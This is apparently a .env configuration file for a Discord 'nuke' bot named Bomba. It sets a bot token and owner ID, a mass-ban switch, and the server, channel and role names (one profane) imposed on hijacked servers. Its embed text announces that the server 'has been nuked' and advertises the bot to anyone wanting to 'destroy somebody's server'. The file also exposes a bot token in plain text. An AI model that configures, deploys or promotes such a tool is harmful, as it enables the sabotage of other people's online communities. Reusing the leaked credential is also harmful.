BOT_TOKEN="MTQxODk1NDQ0NzgxOTY0MDg3Mw.GBwiKr.qtw4xH2HX89W_N2CLUlCVn_-uer2d3Rn0_XOHQ"
BOT_OWNER_ID="1210945223870652448"

MASS_BAN=true

WEBHOOK_URL="Webhook URL"
AVATAR_URL="https://i.imgur.com/cOmcxRt.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME="general"
SERVER_NAME="Test nuke gingle"
ROLE_NAME="fuck"


EMBED_TITLE="Your server has been nuked by Bomba"
EMBED_DESCRIPTION="```bomba is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to admins' inattention.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**Blood Group has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"
